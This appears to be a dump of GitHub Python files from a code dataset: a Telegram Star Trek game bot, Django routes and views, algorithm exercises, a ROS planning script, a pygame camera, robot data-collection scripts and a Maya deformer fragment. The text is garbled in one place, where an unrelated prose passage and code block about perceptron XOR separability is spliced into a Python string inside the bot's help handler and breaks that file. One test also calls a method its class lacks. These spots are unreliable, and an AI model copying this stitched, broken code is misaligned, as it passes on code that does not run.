'startrekbot_contacts.tsv'\nBOT_KEY = \"PUT HERE API KEY\";\n\ndef load_contacts(fn=None):\n\tif fn is None: fn = CONTACTLIST_FN\n\tcontacts = set()\n\ttry:\n\t\tfor l in open(fn):\n\t\t\tz = l.strip()\n\t\t\tcontacts.add(z)\n\texcept:\n\t\treturn set()\n\treturn contacts\n\ndef save_contacts(contacts,fn=None):\n\tif fn is None: fn = CONTACTLIST_FN\n\tfh = open(fn,\"w+\")\n\tfor k in contacts:\n\t\tprint >>fh,str(k)\n\tfh.close()\n\ndef update_contacts(contacts,uu,fn=None):\n\tcontacts.add(uu)\n\tsave_contacts(contacts)\n\treturn contacts\n\ndef bot_error(bot, update, error):\n logging.warn('BOT\\tUpdate \"%s\" caused error \"%s\"' % (update, error))\n\ndef send_msg(bot,contact,msg,mono=True):\n\tif mono:\n\t\tmsg = u\"```\\n\"+msg+u\"\\n```\"\n\tbot.sendMessage(contact, text=msg, parse_mode=\"Markdown\", disable_web_page_preview=True)\n\ndef help_handler(bot, update):\n\tuu = update.message.chat_id\n\tlogging.info(\"USER\\tServe user '%s' with command '/help'\" % (str(uu),) )\n\tsend_msg(bot,uu,\"As a captain of the Enterprise, you should to fly through the galaxy and hunt down a number of Klingon ships. Each game starts with a different number of Klingons, friendly starbases and stars, spread throughout the galaxy.\",False)\n\tsend_msg(bot,uu,\"The galaxy map is arranged as an 8 by 8 grid of quadrants. Each quadrant is further divided into an 8 by 8 grid of sectors. The Enterprise's local surroundings can seen on a text-based map of the current quadrant's sectors.\",False)\n\tsend_msg(bot,uu,\"Stars were represented with a `*`, Klingon ships as a `>!<`, star bases as an ``, and the Enterprise itself with an `-O-`.\",False)\n\tsend_msg(bot,uu,\"The user can also use the long-range scan, LRS, to print out an abbreviated map of the quadrants lying directly around the Enterprise, listing the number of stars, Klingons and starbases in each quadrant.\",False)\n\tsend_msg(bot,uu,\"Klingon ships can be attacked with either phasers or photon torpedos. Phasers do not have to be aimed, but their power falls off with distance, requiring the player to estimate how much power to put into each shot. Also phasers can affect the Enterprise's shields.\",False)\n\tsend_msg(bot,uu,\"Torpedoes do not suffer this drop in power and will destroy a Klingon ship with a single hit, but they have to be aimed using polar coordinates, so misses are possible. Movement, combat and shields all drain the energy supply of the Enterprise, which can be topped up again by flying to a starbase. 
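The poor XOR fit in the plots above is expected: XOR is not linearly separable, so a single perceptron cannot reach full accuracy, while AND can. A quick check:

```python
from sklearn.linear_model import Perceptron

data = [[0, 0], [0, 1], [1, 0], [1, 1]]
clf_and = Perceptron(max_iter=40).fit(data, [0, 0, 0, 1])
clf_xor = Perceptron(max_iter=40).fit(data, [0, 1, 1, 0])
print(clf_and.score(data, [0, 0, 0, 1]))  # 1.0: AND is separable
print(clf_xor.score(data, [0, 1, 1, 0]))  # below 1.0: XOR is not
```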
In case the Enterprise is low on energy or torpedoes, the player could warp to a starbase to refuel and repair.\",False)\n\tsend_msg(bot,uu,\"The game ends when the Enterprise is destroyed or all Klingons are destroyed.\\n\\nUse these digits to specify the direction for the movement/combat:\\n\\n\",False)\n\tsend_msg(bot,uu,\" 7 8 9\\n \\\\|/ \\n 4-o-6\\n /|\\\\ \\n 1 2 3\\n\\n\")\n\tsend_msg(bot,uu,\"Press /start to start a new game. Use /help to read this info again and /about to get a short story about original game.\",False)\n\ndef about_handler(bot, update):\n\tuu = update.message.chat_id\n\tlogging.info(\"USER\\tServe user '%s' with command '/about'\" % (str(uu),) )\n\tsend_msg(bot,uu,\" _____________ ___ \\n / __/_ __/ _ | / _ \\\\\\n _\\ \\ / / / __ |/ , _/\\n/___/ /_/ /_/ |_/_/|_| \\n _________ ______ __\\n /_ __/ _ \\/ __/ //_/\\n / / / , _/ _// ,< \\n /_/ /_/|_/___/_/|_| \\n\")\n\tsend_msg(bot,uu,\"Star Trek is a text-based computer game that puts the player in command of the USS Enterprise on a mission to hunt down and destroy an invading fleet of Klingon warships.\\n\",False)\n\tsend_msg(bot,uu,\"Trek developed out of a brainstorming session between Mike Mayfield and several high school friends in 1971. The original Star Trek television show had only recently ended its run and was still extremely popular. \",False)\n\tsend_msg(bot,uu,\"Mayfield and his \\\"geek friends\\\" wrote down a number of ideas for a game, and during the summer holidays he then started incorporating as many of them as he could on an SDS Sigma 7, using an illicitly borrowed account at the University of California, Irvine.\\n\\nThe original Sigma 7 version, and its descendants, were ported or copied to a wide variety of platforms. Several years later a lot of microcomputer versions appeared and were widely available and modified.\\n\\nStar Trek was reviewed in The Dragon magazine #38. Reviewer Mark Herro described the game in 1980 as \\\"one of the most popular (if not the most popular) computer games around.\\\"\",False)\n\tsend_msg(bot,uu,\"This telegram version was built by [altsoph](http://altsoph.com) based on [a Python port](https://github.com/psychotimmy/trek-game) of the original game by [Tim Holyoake](http://www.tenpencepiece.net/).\\nThanks to Evgeny Vasin and Ivan Yamshchikov for beta-testing.\",False)\n\tsend_msg(bot,uu,\"_____________ _\\n\\\\_(=====/_=_/___.--'-`--.__\\n \\\\ \\\\ `,--,-.__.---'\\n .--`\\\\\\\\--'../\\n '---._____.|]\\n\\n ...dif-tor heh smusma...\\n\")\n\tsend_msg(bot,uu,\"\\nPress /start to start a new game. 
Use /help to read about controls and /about to get this info again.\",False)\n\ndef start_handler(bot, update):\n\t[fsm_objects,contacts] = bot.alt_data\n\tuu = update.message.chat_id\n\tif uu not in contacts: contacts = update_contacts(contacts,uu)\n\tlogging.info(\"USER\\tInit user '%s'\" % (str(uu),) )\n\tfsm_objects[uu] = TrekGame()\n\tfsm_objects[uu].step()\n\tsend_msg(bot,uu,fsm_objects[uu].result())\n\tbot.alt_data = [fsm_objects,contacts]\n\ndef command_handler(bot, update):\n\t[fsm_objects,contacts] = bot.alt_data\n\tuu = update.message.chat_id\n\tm = update.message.text\n\tif uu not in contacts: contacts = update_contacts(contacts,uu)\n\tif uu not in fsm_objects:\n\t\tstart_handler(bot,update)\n\t\treturn\n\n\tprev_state = fsm_objects[uu].get_state()\n\tfsm_objects[uu].step(m)\n\tif fsm_objects[uu].get_state() == 'main_cmd':\n\t\tfsm_objects[uu].step(clear = False)\n\tsend_msg(bot,uu,fsm_objects[uu].result())\n\tescm = \"\".join(ch if unicodedata.category(ch)[0]!=\"C\" else \" \" for ch in m[:min(len(m),128)])\n\tlogging.info(\"USER\\tUser`s '%s' command received: '%s'. State changed from '%s' to '%s'\" % (str(uu),escm,prev_state,fsm_objects[uu].get_state()) )\n\tbot.alt_data = [fsm_objects,contacts]\n\ndef main():\n\tfsm_objects = dict()\n\tcontacts = load_contacts()\n\n\tlogging.basicConfig(filename='startrekbot_%s.log' % (datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"),), \n\t\t\t\t\t\tformat='%(asctime)s\\t%(levelname)s\\t%(message)s', datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)\n\tlogging.info('STATUS\\tStarted') \n\tlogging.info('STATUS\\t%d contacts found' %(len(contacts,)))\n\n\t# Create the EventHandler and pass it your bot's token.\n\tupdater = Updater(BOT_KEY)\n\tupdater.bot.alt_data = [fsm_objects,contacts]\n\t# updater.bot.alt_data = [fsm_states,fsm_objects,contacts]\n\tdp = updater.dispatcher\n\n\t# on different commands - answer in Telegram\n\tdp.add_handler(CommandHandler(\"start\", start_handler))\n\tdp.add_handler(CommandHandler(\"help\", help_handler))\n\tdp.add_handler(CommandHandler(\"about\", about_handler))\n\t# on noncommand i.e message - echo the message on Telegram\n\tdp.add_handler(MessageHandler([Filters.text], command_handler))\n\t# log all errors\n\tdp.add_error_handler(bot_error)\n\t# Start the Bot\n\tupdater.start_polling(poll_interval=0.2)\n\t# Run the bot until the you presses Ctrl-C or the process receives SIGINT,\n\t# SIGTERM or SIGABRT. This should be used most of the time, since\n\t# start_polling() is non-blocking and will stop the bot gracefully.\n\tupdater.idle()\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"altsoph/startrek_game_telegram_bot","sub_path":"startrek_dispatcher_botlib.py","file_name":"startrek_dispatcher_botlib.py","file_ext":"py","file_size_in_byte":7866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18513719740","text":"from django.urls import path\nfrom . 
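The bot above uses the old-style python-telegram-bot API (positional token, `(bot, update)` callbacks, `Filters` lists). A minimal wiring sketch in that same style; 'TOKEN' is a placeholder:

```python
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters

def start(bot, update):
    update.message.reply_text('ready')

def echo(bot, update):
    update.message.reply_text(update.message.text)

updater = Updater('TOKEN')   # pre-v12 style, matching the code above
updater.dispatcher.add_handler(CommandHandler('start', start))
updater.dispatcher.add_handler(MessageHandler([Filters.text], echo))
updater.start_polling(poll_interval=0.2)
updater.idle()
```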
import views\n\nurlpatterns = [\n path('', views.ShowMainView.as_view(), name='main_page'),\n path('biografi//', views.BioDetailView.as_view(), name='full_biografi'),\n path('main_news//', views.MainNewsDetailView.as_view(), name='full_main_news'),\n path('user//', views.ShowUserNews.as_view(), name='user_all_news'),\n path('news//', views.NewsDetailView.as_view(), name='full_news'),\n path('news//update/', views.UpdateNewsView.as_view(), name='update_news'),\n path('news/add/', views.CreateNewsView.as_view(), name='add_news'),\n path('news//delete/', views.DeleteNewsView.as_view(), name='delete_news'),\n path('news/', views.ShowNewsView.as_view(), name='news'),\n path('api/news/', views.ApiNewsView.as_view()),\n path('api/news//', views.ApiNewsDetailView.as_view()),\n\n]\n","repo_name":"geihar/django","sub_path":"main_page/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"24868129351","text":"'''\r\nGiven a parentheses string s containing only the characters '(' and ')'. A parentheses string is balanced if:\r\n\r\nAny left parenthesis '(' must have a corresponding two consecutive right parenthesis '))'.\r\nLeft parenthesis '(' must go before the corresponding two consecutive right parenthesis '))'.\r\nIn other words, we treat '(' as openning parenthesis and '))' as closing parenthesis.\r\n\r\nFor example, \"())\", \"())(())))\" and \"(())())))\" are balanced, \")()\", \"()))\" and \"(()))\" are not balanced.\r\n\r\nYou can insert the characters '(' and ')' at any position of the string to balance it if needed.\r\n\r\nReturn the minimum number of insertions needed to make s balanced.\r\n'''\r\n\r\ndef min_insertions_1(string):\r\n stack = []\r\n opening, closing = '(]'\r\n\r\n # Pre-processing\r\n insertion_cnt = 0\r\n string = string.replace('))', closing)\r\n insertion_cnt += string.count(')')\r\n string = string.replace(')', closing)\r\n\r\n\r\n for idx, ch in enumerate(string):\r\n if ch == opening:\r\n stack += idx,\r\n elif ch == closing:\r\n if not stack:\r\n insertion_cnt += 1\r\n else:\r\n stack.pop()\r\n\r\n insertion_cnt += (len(stack)*2)\r\n return insertion_cnt\r\n\r\n\r\ndef min_insertions_2(string):\r\n opening, closing = '()'\r\n required = right = 0\r\n for ch in string:\r\n if ch == opening:\r\n if right % 2:\r\n right -= 1\r\n required += 1\r\n right += 2\r\n elif ch == closing:\r\n right -= 1\r\n if right < 0:\r\n right += 2\r\n required += 1\r\n return required + right\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # approach 1\r\n assert min_insertions_1('(()))') == 1\r\n assert min_insertions_1('())') == 0\r\n assert min_insertions_1('))())(') == 3\r\n assert min_insertions_1('((((((') == 12\r\n assert min_insertions_1(')))))))') == 5\r\n\r\n # approach 2\r\n assert min_insertions_2('(()))') == 1\r\n assert min_insertions_2('())') == 0\r\n assert min_insertions_2('))())(') == 3\r\n assert min_insertions_2('((((((') == 12\r\n assert min_insertions_2(')))))))') == 5\r\n","repo_name":"royadityak94/InterviewPrep","sub_path":"Grokking/Parantheses_Problems/1541_min_insertions_special_parantheses.py","file_name":"1541_min_insertions_special_parantheses.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2692799549","text":"# encoding: utf-8\nimport torch\nclasses_num = 0\nindices = [[]]\nbraid_indices = [[]]\nbatch_size = None\n\n\ndef 
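How the named routes above resolve elsewhere in the project (argument values are illustrative, and the paths assume the app is mounted at the site root):

```python
from django.urls import reverse

reverse('news')                                      # '/news/'
reverse('full_news', kwargs={'news_slug': 'hello'})  # '/news/hello/'
reverse('update_news', kwargs={'pk': 3})             # '/news/3/update/'
```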
parse_target(target):\n    \"\"\"each element of target ranges from 0. to (classes_num-1)\"\"\"\n    global classes_num, indices, braid_indices, batch_size\n\n    if isinstance(target, list):\n        pass\n    elif isinstance(target, torch.Tensor):\n        target = target.view(-1).numpy().tolist()\n    else:\n        raise TypeError\n\n    indices = [[] for _ in range(classes_num)]\n    for i, e in enumerate(target):\n        indices[int(e)].append(i)\n\n    batch_size = len(target)\n    braid_indices = []\n    for sub_indices in indices:\n        braid_sub_indices = sub_indices + [i + batch_size for i in sub_indices]\n        braid_indices.append(braid_sub_indices)\n\n","repo_name":"wang93/SiameseNet","sub_path":"SampleRateLearning/stable_batchnorm/global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18514023710","text":"from django.shortcuts import render\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\n\nfrom storeapp.models import Products\nfrom tagsapp.models import LabelTag\n\n\ndef home(request):\n    # it will return this product's ContentType id\n    queryset = ContentType.objects.get_for_model(Products)\n\n# here we can use it for indentation\n    LabelTag.objects.select_related(\"Lable\").\\\n        filter(\n            content_type=queryset,\n            object_id=1\n        )\n\n    return render(request, \"store/home.html\")\n\n\ndef updatedata(request):\n    # if we give it here without any filter or specific field then it will update all fields data \n    queryset = Products.objects.update(\n        name=\"aalu\", price=44.2, quantity=44)\n    print(queryset)\n    return render(request, \"store/home2.html\")\n","repo_name":"Gauravraj1141/Django-100-Days","sub_path":"CodeWithMosh/Newqueryset/mystore/storeapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37458475289","text":"import rospy\nimport os\nimport sys\n\nroot_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\nsys.path.insert(0, root_dir)\n\nimport yaml\nimport argparse\nfrom planner import get_planner\nfrom datetime import datetime\n\n\ndef main():\n    # planning experiment in simulator using a specific planner\n    args = parse_args()\n    rospy.init_node(args.planner_type)\n    # find planner configuration file\n\n    experiment_path = os.path.join(\n        root_dir,\n        \"experiments\",\n        \"simulator\",\n        datetime.now().strftime(\"%d-%m-%Y-%H-%M\"),\n    )\n\n    planner_cfg_path = os.path.join(\n        \"planning/config\", f\"{args.planner_type}_planner.yaml\"\n    )\n    assert os.path.exists(planner_cfg_path)\n    with open(planner_cfg_path, \"r\") as config_file:\n        planner_cfg = yaml.safe_load(config_file)\n        planner_cfg.update(args.__dict__)\n\n    planner_cfg[\"planner_type\"] = args.planner_type\n    planner_cfg[\"experiment_path\"] = experiment_path\n    planner_cfg[\"experiment_id\"] = \"record\"\n\n    nbv_planner = get_planner(planner_cfg)\n\n    nbv_planner.start()\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n\n    # mandatory arguments\n    parser.add_argument(\n        \"--planner_type\", \"-P\", type=str, required=True, help=\"planner_type\"\n    )\n    # arguments with default values\n    parser.add_argument(\n        \"--planning_budget\",\n        \"-BG\",\n        type=int,\n        default=20,\n        help=\"maximal measurements for the mission\",\n    )\n    parser.add_argument(\n        \"--device\",\n        type=str,\n        default=\"cuda\",\n        help=\"config file 
path\",\n )\n parser.add_argument(\n \"--gpu_id\",\n type=str,\n default=\"0\",\n help=\"gpu to use, space delimited\",\n )\n parser.add_argument(\n \"--initial_view\",\n type=list,\n default=[0, 0],\n help=\"prefixed initial camera view angle\",\n )\n parser.add_argument(\n \"--random_initial\",\n action=\"store_true\",\n help=\"use random inital camera pose\",\n )\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dmar-bonn/neu-nbv","sub_path":"scripts/planning/simulator_planning.py","file_name":"simulator_planning.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"75"} +{"seq_id":"71592121843","text":"import random\n\ndef linear_search(A, n, i, x):\n\t# A: array, n: number of elements in the array, i: index,\n\t# x: number that is searched in the array\n\tif i > n:\n\t\treturn -1\n\telif i <= n and A[i] == x:\n\t\treturn i\n\telif i <= n and A[i] != x:\n\t\treturn linear_search(A, n, i + 1, x)\n\ndef find_smallest(A, n, i):\n\tsmallest_index = i\n\tfor j in range(i, n):\n\t\tif A[j] < A[smallest_index]:\n\t\t\tsmallest_index = j\n\treturn smallest_index\n\ndef selection_sort(A, n):\n\tfor i in range(0, n):\n\t\tprint(A)\n\t\tsmallest_index = find_smallest(A, n, i)\n\t\ttemp = A[smallest_index] \n\t\tA[smallest_index] = A[i]\n\t\tA[i] = temp\n\treturn A\n\n\nlist10 = []\nfor i in range(10):\n\tlist10.append(random.randrange(1, 100))\n\nprint(list10)\nindex_smallest = find_smallest(list10, len(list10), 0)\nprint(\"list10[\", index_smallest, \"] = \", list10[index_smallest], sep='')\nselection_sort(list10, len(list10))\nprint(\"\\nThe last print\\n\")\nprint(list10)","repo_name":"gcakir/Algorithms_and_Data_Structures","sub_path":"Python/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72732965041","text":"# 210115 이진 변환 반복하기\n# 0과 1로 이루어진 문자열 s의 이진 변환 횟수와 변환 과정에서 제거된 모든 0의 개수를 배열에 담아 return\n\ndef solution(s):\n cnt_0 = 0 # 변환 과정에서 제거되는 0의 개수\n cnt_bin = 0 # 이진 변환의 횟수\n while s != '1' :\n cnt_0 += s.count('0') # 문자열s의 모든 0 제거\n s = bin(s.count('1'))[2:] # s = s에서 모든 0을 제거한 문자열의 길이\n cnt_bin += 1\n answer = [cnt_bin, cnt_0]\n return answer\n\n# testcode\nprint(solution(\"110010101001\")) #[3,8]\nprint(solution(\"01110\")) #[3,3]\nprint(solution(\"1111111\")) #[4,1]","repo_name":"xxhyowon/Algorithm-Python","sub_path":"[020] 이진 변환 반복하기.py","file_name":"[020] 이진 변환 반복하기.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"34428459139","text":"def solution(N):\n count = 0\n empt = []\n res = str(bin(N))\n for i in res[2:]:\n if i == \"0\":\n count += 1\n elif i != \"0\":\n empt.append(count)\n count = 0\n return max(empt)\n\nprint(solution(1041))\nprint(solution(15))","repo_name":"mbarbour0/Practice","sub_path":"Binary/Binary1.py","file_name":"Binary1.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29804532215","text":"import pygame\nfrom tools import rotation\nfrom math import pi\n\nclass Camera:\n def __init__(self, pos=(0, 0, 0), rot=(0, 0, 0)):\n self.pos = list(pos)\n self.rot = list(rot)\n\n def events(self, event):\n if event.type == pygame.MOUSEMOTION:\n x, y = event.rel\n x /= 200 # mouse 
sensor\n y /= 200 # mouse sensor\n self.rot[0] += y; self.rot[1] -= x\n\n def update(self, dt, keys): # camera movements\n\n if keys[pygame.K_LSHIFT]: self.pos[1] += dt # move up\n if keys[pygame.K_SPACE]: self.pos[1] -= dt # move down\n\n if keys[pygame.K_z]: # move foward\n forward = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [0, 0, 1])\n self.pos[0] += dt * forward[0]\n self.pos[1] += dt * forward[1]\n self.pos[2] += dt * forward[2]\n \n if keys[pygame.K_s]: # move backward\n backward = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [0, 0, 1])\n self.pos[0] -= dt * backward[0]\n self.pos[1] -= dt * backward[1]\n self.pos[2] -= dt * backward[2]\n\n if keys[pygame.K_d]: # move right\n left = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [1, 0, 0])\n self.pos[0] += dt * left[0]\n self.pos[1] += dt * left[1]\n self.pos[2] += dt * left[2]\n\n if keys[pygame.K_q]: # move left\n right = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [1, 0, 0])\n self.pos[0] -= dt * right[0]\n self.pos[1] -= dt * right[1]\n self.pos[2] -= dt * right[2]\n\n if keys[pygame.K_w]: self.rot[2] -= dt /10 # rotate the right side\n if keys[pygame.K_x]: self.rot[2] += dt /10 # rotate the left side\n if keys[pygame.K_5]: self.rot[0] = pi / 2; self.pos = [0, -12, 0]","repo_name":"Ganta-KH/Billiard-Pool-Table","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25556546005","text":"import os\nimport torch\nimport argparse\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib.animation as anim\n\n# own libraries\nfrom eipl.model import BasicLSTM, BasicMTRNN\nfrom eipl.utils import normalization\nfrom eipl.utils import restore_args, tensor2numpy\nfrom eipl.data import WeightDownloader\n\n\n# argument parser\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--filename\", type=str, default=None)\nparser.add_argument(\"--idx\", type=str, default=\"0\")\nparser.add_argument(\"--pretrained\", action=\"store_true\")\nargs = parser.parse_args()\n\n# check args\nassert args.filename or args.pretrained, \"Please set filename or pretrained\"\n\n# load pretrained weight\nif args.pretrained:\n WeightDownloader(\"airec\", \"grasp_bottle\")\n args.filename = os.path.join(\n os.path.expanduser(\"~\"), \".eipl/airec/grasp_bottle/weights/RNN/model.pth\"\n )\n\n# restore parameters\ndir_name = os.path.split(args.filename)[0]\nparams = restore_args(os.path.join(dir_name, \"args.json\"))\nidx = int(args.idx)\n\n# load dataset\nminmax = [params[\"vmin\"], params[\"vmax\"]]\nfeat_bounds = np.load(\"../cae/data/feat_bounds.npy\")\n_feats = np.load(\"../cae/data/test/features.npy\")\ntest_feats = normalization(_feats, feat_bounds, minmax)\ntest_joints = np.load(\"../cae/data/test/joints.npy\")\nx_data = np.concatenate((test_feats, test_joints), axis=-1)\nx_data = torch.Tensor(x_data)\nin_dim = x_data.shape[-1]\n\n# define model\nif params[\"model\"] == \"LSTM\":\n model = BasicLSTM(in_dim=in_dim, rec_dim=params[\"rec_dim\"], out_dim=in_dim)\nelif params[\"model\"] == \"MTRNN\":\n model = BasicMTRNN(in_dim, fast_dim=60, slow_dim=5, fast_tau=2, slow_tau=12)\nelse:\n assert False, \"Unknown model name {}\".format(params[\"model\"])\n\nif params[\"compile\"]:\n model = torch.compile(model)\n\n# load weight\nckpt = torch.load(args.filename, map_location=torch.device(\"cpu\"))\nmodel.load_state_dict(ckpt[\"model_state_dict\"])\nmodel.eval()\n\n# Inference\ny_hat = 
[]\nstate = None\nT = x_data.shape[1]\nfor i in range(T):\n _y, state = model(x_data[:, i], state)\n y_hat.append(_y)\n\ny_hat = torch.permute(torch.stack(y_hat), (1, 0, 2))\ny_hat = tensor2numpy(y_hat)\ny_joints = y_hat[:, :, 10:]\ny_feats = y_hat[:, :, :10]\n\n# plot animation\nfig, ax = plt.subplots(1, 2, figsize=(8, 4), dpi=60)\n\n\ndef anim_update(i):\n for j in range(2):\n ax[j].cla()\n\n ax[0].set_ylim(-0.1, 1.1)\n ax[0].set_xlim(0, T)\n ax[0].plot(test_joints[idx, 1:], linestyle=\"dashed\", c=\"k\")\n for joint_idx in range(8):\n ax[0].plot(np.arange(i + 1), y_joints[idx, : i + 1, joint_idx])\n ax[0].set_xlabel(\"Step\")\n ax[0].set_title(\"Joint angles\")\n\n ax[1].set_ylim(-0.1, 1.1)\n ax[1].set_xlim(0, T)\n ax[1].plot(test_feats[idx, 1:], linestyle=\"dashed\", c=\"k\")\n for joint_idx in range(10):\n ax[1].plot(np.arange(i + 1), y_feats[idx, : i + 1, joint_idx])\n ax[1].set_xlabel(\"Step\")\n ax[1].set_title(\"Image features\")\n\n\nani = anim.FuncAnimation(fig, anim_update, interval=int(np.ceil(T / 10)), frames=T)\nani.save(\"./output/{}_{}_{}.gif\".format(params[\"model\"], params[\"tag\"], idx))\n\n# If an error occurs in generating the gif animation or mp4, change the writer (imagemagick/ffmpeg).\n# ani.save(\"./output/{}_{}_{}.gif\".format(params[\"model\"], params[\"tag\"], idx), writer=\"imagemagick\")\n# ani.save(\"./output/{}_{}_{}.mp4\".format(params[\"model\"], params[\"tag\"], idx), writer=\"ffmpeg\")\n","repo_name":"ogata-lab/eipl","sub_path":"eipl/zoo/rnn/bin/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"75"} +{"seq_id":"23131637362","text":"import time\n\nimport numpy as np\nimport py_at_broker as pab\n\nb = pab.broker()\nprint(b.register_signal(\"franka_target_pos\", pab.MsgType.target_pos))\ntime.sleep(0.5)\nprint(b.request_signal(\"franka_lidar\", pab.MsgType.franka_lidar))\nprint(b.request_signal(\"realsense_images\", pab.MsgType.realsense_image))\nprint(b.request_signal(\"franka_state\", pab.MsgType.franka_state))\ntime.sleep(0.5)\n\ncounter = 0\ndefault_pos_c = np.array([0.62, 0.00, 0.56])\n\n\ndef pos_msg(pos):\n msg = pab.target_pos_msg()\n msg.set_ctrl_t(pab.CtrlType.Cartesian)\n msg.set_pos(pos)\n msg.set_timestamp(time.clock_gettime(time.CLOCK_MONOTONIC))\n msg.set_fnumber(counter)\n msg.set_time_to_go(time2go)\n b.send_msg(\"franka_target_pos\", msg)\n\n\nstate = b.recv_msg(\"franka_state\", -1)\ncurrent_pos_c = state.get_c_pos()\nprint(\"initial pos: {}\".format(current_pos_c))\n\nn_points = 100\nn_runs = 10\ntime2go = 1.0\ndelta = 2 * np.pi / n_points\nR = 0.2\n\nlidar_list = []\ntrajectory = []\nc = 0\nn_samples = 1\n\n\nWallMin = [0.28, -0.78, 0.02]\nWallMax = [0.82, 0.78, 1.08]\n\nX = np.random.uniform(WallMin[0], WallMax[0], 100)\nY = np.random.uniform(WallMin[1], WallMax[1], 100)\nZ = np.random.uniform(WallMin[2], WallMax[2], 100)\n\nruns = 0\n\nwhile runs < 10:\n print(\"RUNS: \", runs)\n try:\n pos_msg(default_pos_c)\n time.sleep(2.0)\n state = b.recv_msg(\"franka_state\", -1)\n pos_c = state.get_c_pos()\n print(\"default pos: {}\".format(default_pos_c))\n print(\"current pos: {}\".format(pos_c))\n counter += 1\n time.sleep(2.0)\n for _ in range(300):\n # define next position\n pos_c = pos_c + np.random.uniform(-0.02, 0.02, 3)\n # [x, y, z]\n print(pos_c)\n trajectory.append(pos_c)\n # move\n print(\"move robot\")\n pos_msg(pos_c)\n # stop\n # time.sleep(0.5)\n print(\"start lidar data collected\")\n # measure\n lidar = 
b.recv_msg(\"franka_lidar\", -1)\n lidar_list.append(lidar.get_data())\n counter += 1\n\n new_state = b.recv_msg(\"franka_state\", -1)\n print(\"next pos: {}\".format(new_state.get_c_pos()))\n counter += 1\n\n lidar_array = np.array(lidar_list)\n trajectory_array = np.array(trajectory)\n np.save(\"./random_data/lidar_\" + str(runs) + \".npy\", lidar_array)\n np.save(\"./random_data/trajectory\" + str(runs) + \".npy\", trajectory_array)\n runs += 1\n except KeyboardInterrupt:\n lidar_array = np.array(lidar_list)\n trajectory_array = np.array(trajectory)\n np.save(\"./random_data/lidar_\" + str(runs) + \".npy\", lidar_array)\n np.save(\"./random_data/trajectory\" + str(runs) + \".npy\", trajectory_array)\n runs += 1\n","repo_name":"georgosgeorgos/DLRC_2018","sub_path":"project_dlrc2018/scripts/tutorials/create_random_trajectory.py","file_name":"create_random_trajectory.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"73102310962","text":" \nimport unittest\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n # 虚拟头结点\n dummy = ListNode(-1)\n p, p1, p2 = dummy, l1, l2 \n\n while p1 != None and p2 != None:\n # 比较 p1 和 p2 两个指针\n # 将值较小的的节点接到 p 指针\n if p1.val > p2.val:\n p.next = p2 \n p2 = p2.next \n else:\n p.next = p1 \n p1 = p1.next \n # p 指针不断前进\n p = p.next \n\n if p1 != None:\n p.next = p1\n \n if p2 != None:\n p.next = p2\n\n return dummy.next\n \n\nclass TestSolution(unittest.TestCase):\n def test_0(self):\n s = 1994\n res = \"MCMXCIV\"\n self.assertEqual(res, Solution().intToRoman(s))\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"yiluohan1234/LeetCode-Python","sub_path":"第一章/链表/0021mergeTwoLists.py","file_name":"0021mergeTwoLists.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4049492979","text":"\nimport maya.OpenMayaMPx as OpenMayaMPx\nimport maya.OpenMaya as OpenMaya\nimport maya.cmds as cmds\n\nkDefaultStringAttrValue = 'default'\n\n\nclass BLENDWRRAP(OpenMayaMPx.MPxDeformerNode):\n kPluginNodeName = 'blendwrap'\n kPluginNodeId = OpenMaya.MTypeId(0xBA00110)\n strength = OpenMaya.MObject()\n connected_mesh = OpenMaya.MObject()\n snap_offset = 